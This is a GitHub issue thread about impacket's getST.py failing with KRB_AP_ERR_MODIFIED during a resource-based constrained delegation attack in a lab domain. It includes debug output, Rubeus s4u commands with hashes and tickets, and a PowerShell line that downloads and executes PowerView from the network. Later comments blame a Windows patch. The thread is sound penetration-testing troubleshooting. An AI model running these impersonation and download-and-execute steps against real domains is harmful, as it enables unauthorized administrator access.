### ISSUE TITLE
getST.py fails on RBCD attack with KRB_AP_ERR_MODIFIED(Message stream modified)

### ISSUE THREAD

**Issue by basketas** [SecureAuthCorp/impacket#1216]
### Configuration  
impacket version:  0.9.24
Python version:  3.8.2
Target OS:  Win10 PRO x64

### Debug Output With Command String  

```
getST.py -spn CIFS/WIN10PRO-64EN.LAB.LOCAL -impersonate Administrator -dc-ip 192.168.23.10 LAB.LOCAL/TEMPCOMP$:SecurePass -debug
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[+] Impacket Library Installation Path: c:\program files\python38\lib\site-packages\impacket
[*] Getting TGT for user
[+] Trying to connect to KDC at 192.168.23.10
[+] Trying to connect to KDC at 192.168.23.10
[*] Impersonating Administrator
[+] AUTHENTICATOR
Authenticator:
 authenticator-vno=5
 crealm=LAB.LOCAL
 cname=PrincipalName:
  name-type=1
  name-string=SequenceOf:
   TEMPCOMP$

 cusec=796690
 ctime=20211123174132Z



[+] S4UByteArray
 0000   01 00 00 00 41 64 6D 69  6E 69 73 74 72 61 74 6F   ....Administrato
 0010   72 4C 41 42 2E 4C 4F 43  41 4C 4B 65 72 62 65 72   rLAB.LOCALKerber
 0020   6F 73                                              os
[+] CheckSum
 0000   A5 52 89 70 65 AD 78 CE  FD 09 73 0D 8C D9 6F 44   .R.pe.x...s...oD
[+] PA_FOR_USER_ENC
PA_FOR_USER_ENC:
 userName=PrincipalName:
  name-type=1
  name-string=SequenceOf:
   Administrator

 userRealm=LAB.LOCAL
 cksum=Checksum:
  cksumtype=-138
  checksum=0xa552897065ad78cefd09730d8cd96f44

 auth-package=Kerberos

[+] Final TGS
TGS_REQ:
 pvno=5
 msg-type=12
 padata=SequenceOf:
  PA_DATA:
   padata-type=1
   padata-value=0x6e82051730820513a003020105a10302010ea20703050000000000a382048b6182048730820483a003020105a10b1b094c41422e4c4f43414ca21e301ca003020101a11530131b066b72627467741b094c41422e4c4f43414ca382044d30820449a003020112a103020102a282043b04820437a383bb788b9ed993efdd6a7e7a7c08bb378c688364cc18b1ce7f2c9f672d3649ff64db96763f535a17b065a3454d587a4afb385548a3661161e1ca2da3c63e9dda6c03cbc275ee6a5b2b25d828de52b10b7165398acadfb080b51986443cc858c18eb473879b25e8278cf6f5a203bcc4ccd41c5f16bef7a2b350ae996c6bd685e7121b39bd41c620bc2a961a70bff49b407fe30191b3a179692e33fc08cd45919c32341ded70765c16c9e4cf3108c1cd016663ec3d6f35e84125c1164c5699344b2c89d5a374d946ab36324dd89fd4159c4bc7c19abb4de239066dc9abda36c109145e9954ea03cb9d7c4d538125bff4e2c858ffa2a18ea362086719d094aee5fb4166006f7d5abadfc0675839b013a1836806d657461f4d8c277ec1bc4c8688b96568deacac2f0338c12788992ba2d0c1a8740a599e464c27a532062c6a5e0184944019864c33cf6b703599d67298fee9e3ffcbec7697f1d298a2b01419dd629398e7c2de030119e7204834c3ee06a119a0705d4c17ca165c8756440bf3b48d50657f34ac93d7abf022ba00a9e7f84c13b07288f7fd798b25de9effc152bf875bdd08393f7a3b87f9b477097b13f143e70cacec5b07f913278a6149ba52d5382e86c847bfacb377d56898130816bcf5fefe82ead4119dec8eb358b21183ff0ff1439ab77d39bdd91262b878f83036044eef9f74b040aea6a5c529df76b7d1f33e9335dd56fb3d76b19e34453e212f35f6f44256f4bc39ad89df8a251baff4212f73bc51240568b39e69ee5f8df64170d85c5968e1a1ae8d4d035bf6db83af64722d4d327f278ab54a018e805285c79ef925549d246a25f7502bb101298976acf150a3ff9fa9a7c00502520f6ae40871f676eb67c4c79498b0b8285e73a7c4c1a5ce279db96007d3deb583dc11b467a223f2ae8719cbaab1b0b9e9f7c9bd4ad23c2fd7b960baad7089b56c5dc6894f2938b58947a760b559076dbc98674681f2b21d23e9fea0ee980333827bc1e6c507485d226be43748a9b49f9a8c1b7ae95fb6a8b17bca7bf456dc773cba592192668100365079e83b6f6841882c45646971aa5ad15adb1084a0367d3e28d6ea1e02ff71e95b3ed6fb7316f0cd345dcc3924d0d610c7fb6526e80784e255c1586ad257ee5f2a6e1ac2d8476d78dc93a22bc9f46668c4ba59ce4dabebb7657b4d7f9b8bfc79a92de91bc07fca714bf8fd3649983d8fa9c504f62b1a1d236bc1288656ae3368dda0f751517b14460c4e61d48f8aa1babc1a2fb53909b473c65524c823e479cf96edc287d038f99a80a5528d4233e10073f49167cf755dbc49a07f88686308275d1a25eb637b84b4817f34aae582005782e3628f9d0318de391a747fab8ecbd2d4d90d87cdaec21f1d9fb95c76fda85b22a0eb32213d48a2d5770f4e1fc63185a679fc5ba3b7813f6361a68cce44118c03b7ce2d7649bca81bac2fe816675f38e7f75c18050211836495652a78ac050fd24962cecb9d4348e9c47ffebb631d1712e2ab96a46f306da003020112a2660464fffdde75d4203f15280a1053d8198d09fe2affd0d15ce2f5fdbcb3cc9ab107b9e4dfb189b1797dc5bd4b5e90144ec1a5458bd9369fe13788f9bd1a1d87eec62d9b7f7675c4ec241e141cb809f778f0e81cfe3dcb13d4803e4704d1399c276b3c8b1bac81
  PA_DATA:
   padata-type=129
   padata-value=0x3053a01a3018a003020101a111300f1b0d41646d696e6973747261746f72a10b1b094c41422e4c4f43414ca21c301aa0040202ff76a1120410a552897065ad78cefd09730d8cd96f44a30a1b084b65726265726f73

 req-body=KDC_REQ_BODY:
  kdc-options=1082195968
  realm=LAB.LOCAL
  sname=PrincipalName:
   name-type=0
   name-string=SequenceOf:
    TEMPCOMP$

  till=20211124174132Z
  nonce=1073279695
  etype=SequenceOf:
   18   23


[*]     Requesting S4U2self
[+] Trying to connect to KDC at 192.168.23.10
[+] TGS_REP
TGS_REP:
 pvno=5
 msg-type=13
 crealm=LAB.LOCAL
 cname=PrincipalName:
  name-type=1
  name-string=SequenceOf:
   Administrator

 ticket=Ticket:
  tkt-vno=5
  realm=LAB.LOCAL
  sname=PrincipalName:
   name-type=0
   name-string=SequenceOf:
    TEMPCOMP$

  enc-part=EncryptedData:
   etype=23
   kvno=1
   cipher=0x1e7b0e6731856da8768236b438b509696a2cad0fd086d75612386a4a531ca9be2fc39e39b17833643f349fbb339c589022eb3929c4b134203c5d5741c5f80ac6f0ffdf784e41f28da079930ee677775c60ac74fa03fc811820b3a6996942a92a9191b1065c006330e49c9c455b9c9f0b999fc159d729f751e3d9010336fd86a1aec48310358d7e39b8c73f3f08ba7265d0382be3e5b9c40a79ae709dcb8a9955cc3754d9484f00fad17acd16e4ff4c820acded80245ac9e475dac41d7dc2aad13552a6dc04d47e89119c4fcaaf572b4b6cdb826704ce14c52340280172b0f7731a9eee0d821a4f2576c86bb3e2b34eeda05ab406661bff43a62256f790eff580706e51873a033f04f8b8bfaddaa8efd373af05b6387fdca7787cd14b7c78d47d86f4ceba905d04479af9e93404599f8a87c7aca5bf42e218faf2d5a407462b0fefaee6c2c20df33d4b7c0cda3931df85aa4cbe289fe63f4419f35d8052a2d6380b3bcde9e91f13caf962e212e25532adfa1ff9583c806af71a581d6f0396e59dd15b6166d5d385bb3073cbf1e911c069de807f21d637aac05839b73cecd54ebc048717d58349b046ab830953fdd2e966bb56e52d9b07c84448956a6787c95de32001bf00d6328a7d2017899b8463413da2eba197500b56b80c2408a60594ea51ee16549c0220b282271cb1fd25289fd4790e89b46e27640659b775a80fae92c69aa3c87205b96d3b3c1684d4916a4466d6e3c9c1832dbc9cce7827660d67dc6af2070c4324c5906952a89fc69aebab73be6a253dee6c6ee2da66ee7b51ffccc0fcd2852b3ef48d63b9f825715a926d963f1f4ac10dd3ca7b6bb4e0d75b08bb8b3af105e435a088c7a360a6bf98692e401678ddf98d9ae62ce9e98008557d44bd0885279f14633d00f8e7d11f2f96746a1990606c9fd0b5727f7cb31000c8d5dcd7c25b8456f11cf7e6b2e2e59bbb5404c00a55ac8d0ea29bcaadd1bd308d3c3c12ca9728009de4896e5516476186cd9a2ea999fda8090b332a0b2eddf24a58e4084ccd6910dd540fe8669a7924291b0ee7fc5c8d9298e3e9d430eee2b44f3b106ad1bfedd5672578984c8ade38a3c2d99a588fe4527d0cb6973c5f4f3294750764e5c9cf32de6c4aaa9749445d3896aaf3d295b257d600d5ddca6f2a468d920675b291e6c58e5cfe078ba1637af521f9b6c5e53a87822054b4d6284cab6ef11e79629dbd7f8199193781cc14dfd50e6f2fa7d9b21b784ecaf87fa8a09e58c885b45f07f65f4b1c07550635ee38fdf5878f2cb7a0886e3cead45d9ed4cefc4c37fc991f1244aa989bdd204d7c4f7bea855785f5ab2963f0e8e7f4beddbe3d26f384fa73d3940cf490557a93881f79be0f128f72fea1decaf6735ccf628b885a255a00140a98c174e7729d9414de13acf91c78fe13a64ab8fba75786217d85efc362931bfee29fb2f3b02defe6c73d4a470580a3a97670f370d1ae7d182daaea038d5aa91e6d4ede84d084d86ba6d79c3134963e80e889bcd41e054a867f8ff4e5cca73895a230b43c6109d2a5d5b250255d9104611cc28046ddc53eaa83ebc6208da15565a26a788b9bc75fa249c7306e3b980d9a5f3cc4f1183911c655a3bb


 enc-part=EncryptedData:
  etype=18
  cipher=0x7e28da862183e7e052449db0b98dfb8f9fc38d9a528f34e1dd60c052bc66b01969e3f0ba9aafb40f37773da2c84d3207a3f252644c77fd492d8668181e0e9569bbd15ffd2976abd52fa6f0135f91b96ce8bf8da8d7c152afa58a9218a3c626750a0f30c39f3830ebc780cf182f0bf7379c0ab2b37f04cbfbe0f5ee7e9e8020c206fedd30dbf6385f4238edb65a63bd20c8bddc38e4e4c06168160c3e8fc21e805c4650c49b9dcb11ac269ec352460532475bd4029d6d78f22b74db231636145f27908d6fae7edc3be57d5d195fbf1a6557b0d3641194c8f499cc1651e2ed9cfe6198fab2a8051b0a3740ee1e544030912cdb52


[*]     Requesting S4U2Proxy
[+] Trying to connect to KDC at 192.168.23.10
[+] Server time (UTC): 2021-11-23 17:41:32
[+] Exception
Traceback (most recent call last):
  File "C:\Program Files\Python38\Scripts\getST.py", line 666, in run
    tgs, cipher, oldSessionKey, sessionKey = self.doS4U(tgt, cipher, oldSessionKey, sessionKey, unhexlify(self.__nthash), self.__aesKey, self.__kdcHost)
  File "C:\Program Files\Python38\Scripts\getST.py", line 600, in doS4U
    r = sendReceive(message, self.__domain, kdcHost)
  File "c:\program files\python38\lib\site-packages\impacket\krb5\kerberosv5.py", line 91, in sendReceive
    raise krbError
impacket.krb5.kerberosv5.KerberosError: Kerberos SessionError: KRB_AP_ERR_MODIFIED(Message stream modified)
[-] Kerberos SessionError: KRB_AP_ERR_MODIFIED(Message stream modified)
```

### Additional info:
These are the checks I've made to ensure everything is set correctly, and I don't see anything wrong..

First I tried the same with Rubeus:
Using Rubeus (tried both TEMPCOMP and TEMPCOMP$ as a username):
**Generate hashes:**
```
Rubeus.exe hash /password:SecurePass /user:TEMPCOMP /domain:LAB.LOCAL

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.6.4


[*] Action: Calculate Password Hash(es)

[*] Input password             : SecurePass
[*] Input username             : TEMPCOMP
[*] Input domain               : LAB.LOCAL
[*] Salt                       : LAB.LOCALtempcomp
[*]       rc4_hmac             : 646F349CE50D5E9C7CDE7119AD93785A
[*]       aes128_cts_hmac_sha1 : 282935CF2D712C6F8618D7EE89DEAA7B
[*]       aes256_cts_hmac_sha1 : 0BD94727FD5373175D057CA9F5C70BE2300F0ECD09B6B7C0F74670635AC6BAA6
[*]       des_cbc_md5          : 3BC8BFD90257ABB6
```

**Get the ticket:**
```
Rubeus.exe s4u /user:TEMPCOMP /rc4:646F349CE50D5E9C7CDE7119AD93785A /impersonateuser:Administrator /msdsspn:cifs/win10pro-64en.lab.local /ptt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.6.4

[*] Action: S4U

[*] Using rc4_hmac hash: 646F349CE50D5E9C7CDE7119AD93785A
[*] Building AS-REQ (w/ preauth) for: 'lab.local\TEMPCOMP'
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIFYDCCBVygAwIBBaEDAgEWooIEfjCCBHphggR2MIIEcqADAgEFoQsbCUxBQi5MT0NBTKIeMBygAwIB
      AqEVMBMbBmtyYnRndBsJbGFiLmxvY2Fso4IEPDCCBDigAwIBEqEDAgECooIEKgSCBCbRooMKn9Dvheh0
      jv67HNaULp5Z5Fre385E/P6G6t//z6HYozRZ9TUZtbqwXWwXIQ2tSliwp1dcVvf2wC7Ws2Jsq3/sc5mh
      hX1HwZiP3uyWBuFBygsh/nuiYi/+wN20ymFh3E1Dz0ZrgQSelXtFEpsUTPcOH/t1SNjOKGBLZlBOwblu
      mX1jXY9YvDA9m/31yh10oMixtid0Y4vEB2Kzbnvk3NP/03gc50+EzQxnXqpVl1gzyXn5Uz3IaaRdewL0
      vTRLek+Bf08Y8/UmlHi5EeqkGHZcVTPz9d09uAsIadVzDaJHIovFC8WZnsgvUl1Tm7s5DJXZ2e7gdWX4
      Rsy9CEwXIsqMrnZvOji+bzjRx3mknw6RuZBSwaNHUv2kQ9elmrZLQh3UIqKVlxk9S4VYK1gkt64ojd9f
      DRVIFAIn8aDseLBSHdmvw/sh9a9/YCqkdot3A9zugYKdSnx1xUeboa1+mHbyfxEjKUIoOcjnCjBv9qEz
      UdIPqhnOazqp+Vk9CIDb09Z9lF9ga7qt1q1y9+IxqWNL+BZ+i3JDir3khyBhBBHJwmqJKgnnxZzUartZ
      HnKb8H4EVWM/6lO9tPOWA39Px1Oh0dihHgdGKSjqIAYwNUngcaxwwO8gIwhjWePg0/51Y4T98CifGLh7
      S176HuRJfx/PGgyfv76XxBdznpUzWapfcT2LHsViArxjOmf3YVr65dhzh9ndxJtSJJ4Nqz+rzcCDOjoy
      nn7xYMfXA5peF658zCmsDzesXaNUnHh5Po7Xk568JJYXVvIgGYCrQ+qVTfMP83zJinVWlSr0WyKa+bor
      7Y8EDXMnazmZzFeDlo9ph9bKuuAgJiOYLSbkCI+/hXQi9e2ragNvGqfdlqn7Vxq1tCHdEdQfE4S7VX6L
      NkiYqs2G8bG7Nd4zN9dqfAZOe5dTbllngjUNXIue5aHN6YcGQ+aYLNu/8PbdymWz/yLPCyhdBdmwqqTI
      RXsEbyx9gX9XKINocLfgnsrbuFXtk+gojq3kVyxaq1CEzkSGK528aTE238ornrLLA3IyjgTc1+fFrQa7
      vt2/CSoXb9R1xwD/9ONuHRECS17nzWHFW5TGIahI931WjQX2BtmEfXGV5a2rzyfjVqUDpsP27ec7YDzv
      ejbbYcCOhGaNuy53y3MRB/vZprmtwtZlRkC9MSHCgC3mp4Ax4IZ2paMYe5zbS+a+pV61GCJPAa2uibIk
      7gQYmAha6VNDQr+oRWEhZZAtVCHm/MXYbXJKoYft8tljVvSUKPUz4Onc8kIHnf4FUNX0SQ/E5T4E3d6F
      l/XZ2t6yV7uy0kzeVDYsJTAmexn3K77tnVAVkOCPjxlUwM5YeysVO1LyInR2g82Vqzrsu9ZZIzFrvL0w
      O/BlGtYQgU5zVnOcN867RuXY38/r/yNMaXpOiDWszsCjgc0wgcqgAwIBAKKBwgSBv32BvDCBuaCBtjCB
      szCBsKAbMBmgAwIBF6ESBBDPt+z/joKJulyGoNMjRTY3oQsbCUxBQi5MT0NBTKIVMBOgAwIBAaEMMAob
      CFRFTVBDT01QowcDBQBA4QAApREYDzIwMjExMTIzMTc1MDU5WqYRGA8yMDIxMTEyNDAzNTA1OVqnERgP
      MjAyMTExMzAxNzUwNTlaqAsbCUxBQi5MT0NBTKkeMBygAwIBAqEVMBMbBmtyYnRndBsJbGFiLmxvY2Fs


[*] Action: S4U

[*] Using domain controller: DC01.lab.local (192.168.23.10)
[*] Building S4U2self request for: 'TEMPCOMP@LAB.LOCAL'
[*] Sending S4U2self request
[+] S4U2self success!
[*] Got a TGS for 'Administrator' to 'TEMPCOMP@LAB.LOCAL'
[*] base64(ticket.kirbi):

      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
      AQGhDDAKGwhURU1QQ09NUA==

[*] Impersonating user 'Administrator' to target SPN 'cifs/win10pro-64en.lab.local'
[*] Using domain controller: DC01.lab.local (192.168.23.10)
[*] Building S4U2proxy request for service: 'cifs/win10pro-64en.lab.local'
[*] Sending S4U2proxy request

[X] KRB-ERROR (41) : KRB_AP_ERR_MODIFIED
```

**Check if attributes are added (through PowerView)**
```
cls
IEX(New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/ZeroDayLab/PowerSploit/master/Recon/PowerView.ps1")
Get-NetComputer win10pro-64en | Select-Object -Property name, msds-allowedtoactonbehalfofotheridentity

$RawBytes = Get-DomainComputer win10pro-64en -Properties 'msds-allowedtoactonbehalfofotheridentity'|select -expand msds-allowedtoactonbehalfofotheridentity
$Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0
$Descriptor.DiscretionaryAcl 

Write-Host "RBCD set for computer account: " (ConvertFrom-SID $Descriptor.DiscretionaryAcl.SecurityIdentifier) "`n"

```
![image](https://user-images.githubusercontent.com/16399561/143089113-576756a2-f4d5-41d8-9cc6-ae0f439724c2.png)

**Check if attributes are added (through StandIn)**
`standin.exe --delegation
`
![image](https://user-images.githubusercontent.com/16399561/143089084-5202419c-eba6-4d5c-8746-43627c2397c9.png)

**Check if attributes are added (Manually):**
![image](https://user-images.githubusercontent.com/16399561/143089063-10d0fe68-2ccf-47bb-9b9b-16022680b6c9.png)

**Check if selected user is allowed to be impersonated.** 
Although it shouldn't matter for RBCD. Let's pick Administrator (although any user or computer account should work as well as long as it has administrative privileges on the target computer):
![image](https://user-images.githubusercontent.com/16399561/143089046-2380de80-e406-4d16-bf38-464edf4eec53.png)

All looks fine... Although I have checked and tried other user and computer accounts as well.. Both privileged and unprivileged...

**Comment by synap5e** [comment]
Did you work out why this was?

**Comment by basketas** [comment]
Microsoft messed up with a patch... It works now, although I am having trouble using the generated kerberos tickets now.. Wireshark reports Encryption Type Unsupported..
But since I don't know why it happens yet, I will not post a bug report on wmiexec/psexec.py

**Comment by synap5e** [comment]
I'm getting the error too for both impacket and rubeus too. Was there a fix you found to get it to work?

**Comment by funnybananas** [comment]
Having the same issue here too. AD delegation settings are identical to what you have above. I also validated the TGS is marked "FORWARDABLE".

DC: Windows Server 2016 fully up-to-date as of today.

Any updates?

**Comment by basketas** [comment]
There is an OOB update if you manage to find it... otherwise, wait a month
or so for a patch tuesday...

**Comment by funnybananas** [comment]
Gotcha, thanks. Regarding your "ENCTYPE_NOT_SUPPORTED" error, did you check the local security policy on both your client and DC and ensure `Local Policies > Security Options > Network Security: Configure encryptions types allowed for Kerberos` to match?

**Comment by basketas** [comment]
I have.. I even enabled only AES256 as it is going to be automatically
picked.. And it was, when checked in wireshark.. But still I get this error
when using e.g. psexec.py

Or access denied when trying to access a remote share using the domain
admin injected ticket..

**Comment by funnybananas** [comment]
Okay. I've been having similar issues for the better part of the week, and have banging my head against a wall trying to figure out what changed from a few weeks ago.  Guess I'll wait in the meantime and see if a patch corrects it while I'll dig deeper.

**Comment by basketas** [comment]
This is the OOB patch for server 2016 used..
https://www.catalog.update.microsoft.com/Search.aspx?q=KB5008601

Patches for some other OSes can be found here although I think Win10 solved it with cumulative patch:
https://support.microsoft.com/en-us/topic/november-14-2021-kb5008602-os-build-17763-2305-out-of-band-8583a8a3-ebed-4829-b285-356fb5aaacd7


My problem with unsupported encryption type, along with the screenshots of Wireshark dump and all other details is posted here:
https://bloodhoundhq.slack.com/archives/C20LT7PL3/p1637957094148900?thread_ts=1637707588.132600&cid=C20LT7PL3
